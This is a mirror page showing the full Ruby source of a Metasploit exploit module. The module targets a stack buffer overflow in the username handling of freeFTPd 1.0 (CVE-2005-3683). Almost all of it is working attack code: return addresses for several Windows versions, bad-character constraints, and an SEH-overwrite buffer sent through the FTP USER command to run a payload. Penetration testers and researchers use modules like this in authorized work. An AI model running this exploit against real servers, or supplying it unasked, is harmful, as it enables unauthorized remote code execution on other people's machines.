Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/freeftpd_user.rb
32789 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Ftp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'freeFTPd 1.0 Username Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in the freeFTPd

19
          multi-protocol file transfer service. This flaw can only be

20
          exploited when logging has been enabled (non-default).

21
        },

22
        'Author' => 'MC',

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'CVE', '2005-3683'],

26
          [ 'OSVDB', '20909'],

27
          [ 'BID', '15457']

28
        ],

29
        'Privileged' => false,

30
        'Payload' => {

31
          'Space' => 800,

32
          'BadChars' => "\x00\x20\x0a\x0d",

33
          'StackAdjustment' => -3500

34
        },

35
        'Targets' => [

36
          [

37
            'Windows 2000 English ALL',

38
            {

39
              'Platform' => 'win',

40
              'Ret' => 0x75022ac4

41
            },

42
          ],

43
          [

44
            'Windows XP Pro SP0/SP1 English',

45
            {

46
              'Platform' => 'win',

47
              'Ret' => 0x71aa32ad

48
            },

49
          ],

50
          [

51
            'Windows NT SP5/SP6a English',

52
            {

53
              'Platform' => 'win',

54
              'Ret' => 0x776a1799

55
            },

56
          ],

57
          [

58
            'Windows 2003 Server English',

59
            {

60
              'Platform' => 'win',

61
              'Ret' => 0x7ffc0638

62
            },

63
          ],

64
        ],

65
        'DisclosureDate' => '2005-11-16',

66
        'Notes' => {

67
          'Reliability' => UNKNOWN_RELIABILITY,

68
          'Stability' => UNKNOWN_STABILITY,

69
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

70
        }

71
      )

72
    )

73
  end

74


75
  def check

76
    connect

77
    disconnect

78
    if (banner =~ /freeFTPd 1\.0/)

79
      return Exploit::CheckCode::Appears

80
    end

81


82
    return Exploit::CheckCode::Safe

83
  end

84


85
  def exploit

86
    connect

87


88
    print_status("Trying target #{target.name}...")

89


90
    buf = rand_text_english(1816, payload_badchars)

91
    seh = generate_seh_payload(target.ret)

92
    buf[1008, seh.length] = seh

93


94
    send_cmd(['USER', buf], false)

95


96
    handler

97
    disconnect

98
  end

99
end

100


101